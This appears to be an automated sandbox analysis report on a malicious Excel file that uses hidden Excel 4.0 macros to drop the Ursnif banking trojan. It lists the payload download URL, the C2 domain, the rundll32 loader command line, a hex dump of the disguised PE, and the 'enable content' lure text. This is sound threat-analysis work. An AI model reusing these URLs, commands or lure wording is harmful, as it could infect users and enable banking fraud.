Loading ...

Play interactive tourEdit tour

Analysis Report OCC-221220-TBU1XAT7X4.xls

Overview

General Information

Sample Name:OCC-221220-TBU1XAT7X4.xls
Analysis ID:333660
MD5:c4356a3b949b77bce8be5ecf2def64db
SHA1:e5de9340e03e98e6e0b8f6630cfd40295a6c9881
SHA256:7389677e946cac4226da9b84eca90b94b59d46cf2bf4541ea58d96d39e6669d5
Tags:goziIFSBUrsnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Ursnif
Creates a COM Internet Explorer object
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Downloads files with wrong headers with respect to MIME Content-Type
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes registry values via WMI
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2360 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2556 cmdline: rundll32 ..\cnvmb.rty,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2536 cmdline: rundll32 ..\cnvmb.rty,DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • iexplore.exe (PID: 1164 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 4EB098135821348270F27157F7A84E65)
    • iexplore.exe (PID: 960 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
    • iexplore.exe (PID: 2456 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2 MD5: 8A590F790A98F3D77399BE457E01386A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
OCC-221220-TBU1XAT7X4.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4e56f:$s1: Excel
  • 0x4ecea:$s1: Excel
  • 0x4ee41:$s1: Excel
  • 0x4eeaf:$s1: Excel
  • 0x4eec8:$s1: Excel
  • 0x36a3:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    Process Memory Space: rundll32.exe PID: 2536JoeSecurity_UrsnifYara detected UrsnifJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: rundll32 ..\cnvmb.rty,DllRegisterServer, CommandLine: rundll32 ..\cnvmb.rty,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2360, ProcessCommandLine: rundll32 ..\cnvmb.rty,DllRegisterServer, ProcessId: 2556

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for dropped fileShow sources
      Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngAvira: detection malicious, Label: HEUR/AGEN.1138179
      Source: C:\Users\user\cnvmb.rtyAvira: detection malicious, Label: HEUR/AGEN.1138179
      Source: 4.2.rundll32.exe.1c0000.0.unpackAvira: Label: TR/Patched.Ren.Gen

      Software Vulnerabilities:

      barindex
      Document exploit detected (drops PE files)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: ox9[1].png.0.drJump to dropped file
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
      Source: excel.exeMemory has grown: Private usage: 4MB later: 54MB

      Networking:

      barindex
      Creates a COM Internet Explorer objectShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\Progid
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgID
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
      Downloads files with wrong headers with respect to MIME Content-TypeShow sources
      Source: httpImage file has PE prefix: HTTP/1.1 200 OK Date: Wed, 23 Dec 2020 13:48:46 GMT Server: Apache/2.4.25 (Debian) Last-Modified: Tue, 22 Dec 2020 12:15:21 GMT ETag: "3a400-5b70c874cc840" Accept-Ranges: bytes Content-Length: 238592 Connection: close Content-Type: image/png Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 23 Dec 2020 13:48:46 GMTServer: Apache/2.4.25 (Debian)Last-Modified: Tue, 22 Dec 2020 12:15:21 GMTETag: "3a400-5b70c874cc840"Accept-Ranges: bytesContent-Length: 238592Connection: closeContent-Type: image/pngData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a9 44 a5 bf ed 25 cb ec ed 25 cb ec ed 25 cb ec 82 3a c0 ec ec 25 cb ec 6e 39 c5 ec f9 25 cb ec 82 3a c1 ec d5 25 cb ec e4 5d 58 ec eb 25 cb ec ca e3 b0 ec ee 25 cb ec ed 25 ca ec bf 25 cb ec e4 5d 4f ec ec 25 cb ec e4 5d 59 ec ec 25 cb ec f3 77 5f ec ec 25 cb ec e4 5d 5a ec ec 25 cb ec 52 69 63 68 ed 25 cb ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 59 4c f5 5b 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 09 00 00 b6 01 00 00 20 02 00 00 00 00 00 90 1e 00 00 00 10 00 00 00 d0 01 00 00 00 00 10 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 00 04 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 e6 01 00 4b 00 00 00 64 de 01 00 64 00 00 00 00 e0 03 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 03 00 48 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 01 00 58 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 b4 01 00 00 10 00 00 00 b6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5b 16 00 00 00 d0 01 00 00 18 00 00 00 ba 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a0 ed 01 00 00 f0 01 00 00 b8 01 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 60 09 00 00 00 e0 03 00 00 0a 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 58 0e 00 00 00 f0 03 00 00 10 00 00 00 94 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
      Source: global trafficHTTP traffic detected: GET /ox9.png HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: companieshouseonlinedownload.comConnection: Keep-Alive
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: unknownDNS traffic detected: queries for: companieshouseonlinedownload.com
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: http://%s=%s&file://&os=%u.%u_%u_%u_x%uindex.html;
      Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.11.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
      Source: OCC-221220-TBU1XAT7X4.xls, before.2.0.0.sheet.csv_unpackString found in binary or memory: http://companieshouseonlinedownload.com/ox9.png
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
      Source: 77EC63BDA74BD0D0E0426DC8F8008506.11.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: rundll32.exe, 00000004.00000002.2420654046.00000000023A0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: rundll32.exe, 00000003.00000002.2420330626.0000000001D17000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420433379.0000000002017000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: rundll32.exe, 00000004.00000002.2421932090.0000000004500000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: https://hospader.xyz
      Source: imagestore.dat.11.drString found in binary or memory: https://hospader.xyz/favicon.ico
      Source: rundll32.exe, 00000003.00000002.2420076289.0000000000730000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmp, rundll32.exe, 00000004.00000002.2420212763.0000000000A30000.00000002.00000001.sdmp, ~DF3C5C2A9E584434E2.TMP.10.drString found in binary or memory: https://hospader.xyz/index.htm
      Source: rundll32.exe, 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmpString found in binary or memory: https://hospader.xyz/index.htm1
      Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drString found in binary or memory: https://hospader.xyz/index.htmRoot
      Source: rundll32.exe, 00000004.00000002.2420139760.000000000064D000.00000004.00000020.sdmpString found in binary or memory: https://hospader.xyz/index.htma;
      Source: {5591F91E-4571-11EB-ADCF-ECF4BBB5915B}.dat.10.drString found in binary or memory: https://hospader.xyz/index.htmndex.htm
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
      Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443

      Key, Mouse, Clipboard, Microphone and Screen Capturing:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      E-Banking Fraud:

      barindex
      Yara detected UrsnifShow sources
      Source: Yara matchFile source: 00000004.00000002.2421789908.00000000043B0000.00000004.00000040.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2536, type: MEMORY

      System Summary:

      barindex
      Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
      Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the ed't'ng document d2n|oaded from the 'nternet "7 0Protected View This
      Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start g) the decryption of the documen
      Source: Document image extraction number: 2Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet."7 0Protected View This
      Source: Document image extraction number: 2Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
      Source: Document image extraction number: 3Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
      Source: Document image extraction number: 3Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: OCC-221220-TBU1XAT7X4.xlsInitial sample: CALL
      Source: OCC-221220-TBU1XAT7X4.xlsInitial sample: EXEC
      Office process drops PE fileShow sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cnvmb.rtyJump to dropped file
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ox9[1].pngJump to dropped file
      Writes registry values via WMIShow sources
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_10002415 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A1757 memcpy,memcpy,lstrcatW,CreateEventA,NtQueryInformationProcess,CloseHandle,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A4DF0 NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,RtlNtStatusToDosError,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AAC53 RtlInitUnicodeString,NtClose,RtlNtStatusToDosError,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A6101 RtlNtStatusToDosError,NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_100021F4
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AC490
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001AB8DC
      Source: OCC-221220-TBU1XAT7X4.xlsOLE indicator, VBA macros: true
      Source: OCC-221220-TBU1XAT7X4.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
      Source: rundll32.exe, 00000003.00000002.2420131339.0000000001B30000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2420252925.0000000001E30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
      Source: classification engineClassification label: mal100.bank.troj.expl.evad.winXLS@10/28@5/2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_001A3553 CoCreateInstance,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\CDDE0000Jump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\Local\28835087-CD0E-3290-3D29-EA6553635A2C
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD5A6.tmpJump to behavior
      Source: OCC-221220-TBU1XAT7X4.xlsOLE indicator, Workbook stream: true
      Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - select * from win32_process
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
      Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:275457 /prefetch:2
      Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1164 CREDAT:799749 /prefetch:2
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\cnvmb.rty,DllRegisterServer
